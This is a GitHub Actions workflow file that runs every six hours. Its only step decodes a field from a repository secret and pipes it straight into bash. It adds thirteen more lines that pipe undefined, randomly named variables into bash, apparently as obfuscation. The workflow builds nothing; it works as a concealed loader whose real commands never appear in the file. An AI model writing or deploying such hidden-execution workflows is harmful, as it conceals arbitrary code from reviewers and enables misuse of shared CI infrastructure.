name: pengjingzhong7519

on:
  workflow_dispatch:
  schedule:
    - cron: '26 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pengjingzhong7519
        env:
          ogp2: ${{ secrets.ogp2 }}
        run: |
          echo $ogp2 | jq -r .uzpg02 | /bin/bash
          echo $n93875 | jq -r .u65982 | /bin/bash
          echo $y0216 | jq -r .fmo99 | /bin/bash
          echo $ho42549 | jq -r .zsdf261 | /bin/bash
          echo $pbfy0 | jq -r .bof010 | /bin/bash
          echo $kntq227 | jq -r .mgo45432 | /bin/bash
          echo $d2 | jq -r .chimj5 | /bin/bash
          echo $o3 | jq -r .owxo5212 | /bin/bash
          echo $zktj383 | jq -r .hvrj66 | /bin/bash
          echo $ldx95908 | jq -r .paba14699 | /bin/bash
          echo $ml901 | jq -r .jvkcq63 | /bin/bash
          echo $eq34744 | jq -r .ny0809 | /bin/bash
          echo $rvql377 | jq -r .ce5892 | /bin/bash
          echo $ugs3849 | jq -r .yuaur05456 | /bin/bash

